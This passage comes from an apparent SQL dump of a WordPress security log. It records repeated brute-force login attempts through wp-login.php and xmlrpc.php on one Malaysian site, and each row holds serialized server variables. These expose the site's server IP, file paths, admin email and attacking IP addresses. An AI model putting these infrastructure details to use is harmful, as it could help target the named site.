21:41:16',17741608,19232192,'https://bintara.com.my/wp-login.php',1,0,'148.66.133.15'),(24285,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"153.126.195.38\";s:11:\"REMOTE_PORT\";s:5:\"38708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAA@2ShanGhHYaqyCTPrgAAAAM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568669947.2499\";s:12:\"REQUEST_TIME\";s:10:\"1568669947\";}}','notice','2019-09-16 21:39:08','2019-09-16 21:39:07',18260632,19560496,'https://bintara.com.my/xmlrpc.php',1,0,'153.126.195.38'),(24284,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"153.126.195.38\";s:11:\"REMOTE_PORT\";s:5:\"38012\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAA@LIp53uPsY7BKArAxwAAAFE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568669944.5219\";s:12:\"REQUEST_TIME\";s:10:\"1568669944\";}}','notice','2019-09-16 21:39:05','2019-09-16 21:39:04',17740552,19231048,'https://bintara.com.my/wp-login.php',1,0,'153.126.195.38'),(24283,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.127.108\";s:11:\"REMOTE_PORT\";s:5:\"57924\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX--XWShanGhHYaqyCTODgAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568669533.6902\";s:12:\"REQUEST_TIME\";s:10:\"1568669533\";}}','notice','2019-09-16 21:32:15','2019-09-16 21:32:14',18260504,19557800,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.127.108'),(24282,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.127.108\";s:11:\"REMOTE_PORT\";s:5:\"57294\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX--WmkPXSyJlCUJQmoprAAAAZM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568669530.4967\";s:12:\"REQUEST_TIME\";s:10:\"1568669530\";}}','notice','2019-09-16 21:32:11','2019-09-16 21:32:10',17740872,19231592,'https://bintara.com.my/wp-login.php',1,0,'104.238.127.108'),(24281,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"46734\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-@fGShanGhHYaqyCTNGAAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568669308.4551\";s:12:\"REQUEST_TIME\";s:10:\"1568669308\";}}','notice','2019-09-16 21:28:29','2019-09-16 21:28:28',18260680,19560496,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.136.152'),(24280,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"46278\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-@eGShanGhHYaqyCTNFQAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568669305.0158\";s:12:\"REQUEST_TIME\";s:10:\"1568669305\";}}','notice','2019-09-16 21:28:26','2019-09-16 21:28:25',17740944,19231976,'https://bintara.com.my/wp-login.php',1,0,'138.68.136.152'),(24279,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.221.116\";s:11:\"REMOTE_PORT\";s:5:\"41727\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-9R7Ip53uPsY7BKArAfAAAAEw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568668999.6483\";s:12:\"REQUEST_TIME\";s:10:\"1568668999\";}}','notice','2019-09-16 21:23:21','2019-09-16 21:23:20',18260456,19558016,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.221.116'),(24278,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.221.116\";s:11:\"REMOTE_PORT\";s:5:\"41226\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-9RGkPXSyJlCUJQmopMwAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568668996.4419\";s:12:\"REQUEST_TIME\";s:10:\"1568668996\";}}','notice','2019-09-16 21:23:17','2019-09-16 21:23:16',17741216,19231880,'https://bintara.com.my/wp-login.php',1,0,'178.62.221.116'),(24277,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"37886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-72WkPXSyJlCUJQmoohQAAAY4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568668633.2897\";s:12:\"REQUEST_TIME\";s:10:\"1568668633\";}}','notice','2019-09-16 21:17:14','2019-09-16 